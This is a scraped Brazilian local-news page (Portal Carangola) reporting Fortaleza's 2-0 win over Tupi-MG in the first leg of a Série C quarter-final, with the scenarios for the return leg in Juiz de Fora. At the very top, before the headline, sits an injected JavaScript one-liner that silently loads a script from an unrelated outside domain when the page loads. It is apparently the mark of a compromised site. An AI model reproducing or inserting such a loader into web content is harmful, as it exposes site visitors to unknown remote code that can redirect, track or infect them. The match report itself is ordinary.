;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Fortaleza voa no 2º tempo, bate Tupi de Juiz de Fora e sai em vantagem nas quartas da Série C. - Portal Carangola

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Fortaleza voa no 2º tempo, bate Tupi de Juiz de Fora e sai em vantagem nas quartas da Série C.

O Fortaleza deu um passo importante para, finalmente, colocar fim à agonia de oito anos na Série C do Campeonato Brasileiro. Em um segundo tempo arrasador, o Leão atropelou o Tupi-MG na Arena Castelão na tarde deste sábado, pela partida ida das quartas de final da competição. Depois do primeiro tempo em que viu o time mineiro ter chances de abrir o placar e trazer à memória do torcedor todo o histórico negativo na competição, o tricolor precisou de dois minutos da segunda etapa para abrir o placar, desmontar a defesa do Galo Carijó e abrir uma vantagem importante: vitória por 2 a 0, gols de Leandro Lima e Bruno Melo, de pênalti, e uma grande vantagem na bagagem para a partida de volta em Juiz de Fora. É a primeira vez que o Leão fica em vantagem em um mata-mata da Série C.

E agora

O Fortaleza afastou o retrospecto negativo e chegará tranquilo em Minas Gerais para o jogo no Estádio Municipal Radialista Mário Helênio, às 20h30, em Juiz de Fora. O tricolor pode perder por um gol de diferença no jogo que fica com a tão sonhada vaga. Se fizer um gol em Juiz de Fora, o Leão pode até ser derrotado por dois gols de diferença. o Galo precisa vencer por três de vantagem para levar a vaga. Se bater o adversário por 2 a 0, a decisão vai para as penalidades.